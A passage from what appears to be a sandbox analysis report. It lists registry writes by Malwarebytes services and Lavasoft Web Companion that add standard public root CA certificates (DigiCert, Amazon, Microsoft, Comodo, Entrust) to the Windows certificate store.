| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{993A5C11-A9B8-41E9-9088-C5182B1F279A}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E\Blob = 0300000001000000140000000d44dd8c3c8c1a1a58756481e90f2e2affb3d26e2000000001000000ba010000308201b63082015ba0030201020213066c9fd5749736663f3b0b9ad9e89e7603f24a300a06082a8648ce3d0403023039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412033301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f7420434120333059301306072a8648ce3d020106082a8648ce3d030107034200042997a7c6417fc00d9be8011b56c6f252a5ba2db212e8d22ed7fac9c5d8aa6d1f73813b3b986b397c33a5c54e868e8017686245577d44581db337e56708eb66dea3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414abb6dbd7069e37ac3086079170c79cc419b178c0300a06082a8648ce3d0403020349003046022100e08592a317b78df92b06a593ac1a98686172fae1a1d0fb1c7860a64399c5b8c40221009c02eff1949cb396f9ebc62af8b62cfe3a901416d78c6324481cdf307dd5683b | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa22000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b4030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3490f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 0400000001000000100000004be2c99196650cf40e5a9392a00afeb20f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd94090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b0601050507030762000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3390b000000010000001800000045006e00740072007500730074002e006e006500740000001400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab1d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d347e000000010000000800000000c001b39667d6010300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d4190000000100000010000000fa46ce7cbb85cfb4310075313a09ee052000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92fea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6 | C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b4040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
